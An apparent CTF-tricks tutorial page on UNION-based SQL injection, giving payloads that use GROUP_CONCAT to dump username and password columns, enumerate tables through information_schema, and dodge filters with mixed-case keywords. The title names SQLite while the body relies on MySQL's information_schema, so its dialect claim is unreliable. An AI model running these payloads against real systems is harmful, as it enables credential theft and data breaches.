> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/sqli/data-extraction/trick-0463.md).

# SQL Injection Data Extraction from Specific Tables (SQLite)

***

After identifying relevant table and column names (e.g., `admintable`, `usertable` with `username`, `password`), you can use a UNION-based SQL injection combined with `group_concat()` to extract all data from a specific column or even multiple columns in a single query.

The `GROUP_CONCAT()` function is particularly useful as it aggregates values from a group into a single string, separated by a specified separator (default is comma). This allows retrieving multiple results from a query that would normally return multiple rows into a single, manageable output row.

For example, to extract all usernames and passwords from `admintable` and `usertable`, using case variation for bypass:

```sql
smokey' uNion sElect group_concat(username) fRom admintable '
```

```sql
smokey' uNion sElect group_concat(password) fRom admintable '
```

```sql
smokey' uNion sElect group_concat(username) fRom usertable '
```

```sql
smokey' uNion sElect group_concat(password) fRom usertable '
```

This technique aggregates all values from the specified column into a single string output, making data retrieval straightforward.

Beyond individual columns, `GROUP_CONCAT()` can be combined with `CONCAT()` or hex-encoded separators to extract multiple columns together. This allows retrieving pairs or sets of data (like username and password) in a single aggregated string.

For instance, after identifying the database and table names (often found in `information_schema.tables`), you can list table names using `GROUP_CONCAT`:

```sql
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
```

Similarly, to list column names for a specific table (e.g., 'users'), you can use:

```sql
union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
```

Once the relevant table (`users`) and columns (`username`, `password`) are known, you can extract the data concatenated together:

```sql
union select 1,group_concat(username,0x3a,password) from users
```

In this example, `0x3a` is the hexadecimal representation for a colon (`:`), used as a separator between the username and password within the aggregated string. This query retrieves all username-password pairs from the `users` table, concatenated with a colon and aggregated into a single string.

Another variation using `CONCAT` and `GROUP_CONCAT` to retrieve multiple columns in a single row might look like this, assuming three columns are needed for the UNION:

```sql
SELECT 'a', 'b', 'c' UNION SELECT GROUP_CONCAT(username), GROUP_CONCAT(password), 'c' FROM users
```

This approach retrieves the usernames and passwords from the `users` table, each aggregated into a single string in the first two columns of the result set. The third column contains a static value to match the column count of the initial `SELECT`.

These examples demonstrate how `GROUP_CONCAT()` is a powerful function in MySQL (and similar functions exist in other SQL dialects) for aggregating data during UNION-based SQL injection, significantly simplifying the process of extracting large amounts of information from a database.
